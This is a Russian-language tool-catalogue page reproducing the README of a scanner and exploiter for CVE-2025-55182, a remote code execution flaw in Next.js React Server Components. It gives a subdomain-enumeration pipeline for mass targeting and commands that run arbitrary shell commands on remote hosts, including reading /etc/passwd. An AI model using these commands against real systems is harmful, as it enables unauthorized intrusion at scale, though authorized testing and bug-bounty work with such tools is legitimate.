Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/jan0x190/cve-2025-55182-simple-scanner-main
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеПеречисление ПоддоменовОбучение и Образование
GitHubjan0x190/cve-2025-55182-simple-scanner-main

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182-Simple-Scanner-main

Многоязычный сканер для CVE-2025-55182 RCE в Next.js React Server Components, с режимами одиночного и массового сканирования и встроенным рабочим процессом разведки для bug bounty.

Репозиторий
149 месяцев назадЕщё не проверено

CVE-2025-55182: Сканер RCE для React Server Components

Комплексный набор инструментов для обнаружения и эксплуатации CVE-2025-55182, критической уязвимости удаленного выполнения кода в приложениях Next.js, использующих React Server Components.

Этот репозиторий включает единый Bash-сканер (режим одиночной и массовой проверки), реализации на Python/Go и рабочий процесс разведки для баг-баунти.

Меню сканера Демонстрация сканера


📂 Структура репозитория

  • scanner.sh — Универсальный Bash-скрипт для одиночной и массовой проверки
  • python/exploit.py — Стабильная реализация на Python (лучшее экранирование JSON)
  • go/main.go — Высокопроизводительная реализация (компилируемая)

🚀 Рабочий процесс разведки (методология баг-баунти)

Для массового поиска на wildcard-доменах используйте этот пайплайн для фильтрации целей перед сканированием:

root@kitploit:~
# 1. Перечисление поддоменов
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. Фильтрация живых хостов
httpx -l subs.txt -o live.txt

# 3. Предварительное обнаружение с помощью Nuclei (опционально)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ Использование Bash-сканера (рекомендуется)

Скрипт scanner.sh поддерживает одиночную проверку цели и массовое сканирование из файла со списком.

🔧 Установка

root@kitploit:~
chmod +x scanner.sh

1️⃣ Режим одиночной цели

Лучше всего подходит для проверки конкретной цели с подробным выводом.

root@kitploit:~
# Базовая проверка (по умолчанию "id")
./scanner.sh -d example.com

# Выполнение произвольной команды
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ Режим массового сканирования

Эффективно сканирует список URL и сохраняет уязвимые хосты в файл.

root@kitploit:~
# Сканирование списка URL
./scanner.sh -l live.txt -c "whoami"

# Пользовательский выходной файл
./scanner.sh -l live.txt -o my_bounty.txt

Параметры


🐍 Версия на Python

Используйте её, если возникают проблемы с экранированием специальных символов в Bash.

Требования

root@kitploit:~
pip install requests

Использование

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 Версия на Go

Высокая производительность, минимальные зависимости.

Запуск напрямую

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

Сборка бинарного файла

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование строго запрещено законом. Разработчик не несет ответственности за неправомерное использование или ущерб, причиненный данной программой.


🔗 Ссылки

  • Детали CVE от NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • Рекомендации по безопасности React (уязвимость React Server Components): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • Шаблон Nuclei от ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182

Скачать инструмент
ФлагОписание
-d, --domainURL одиночной цели
-l, --listФайл со списком URL
-c, --commandКоманда для выполнения (по умолчанию: id)
-o, --outputВыходной файл для уязвимых хостов (по умолчанию: vulnerable_hosts.txt)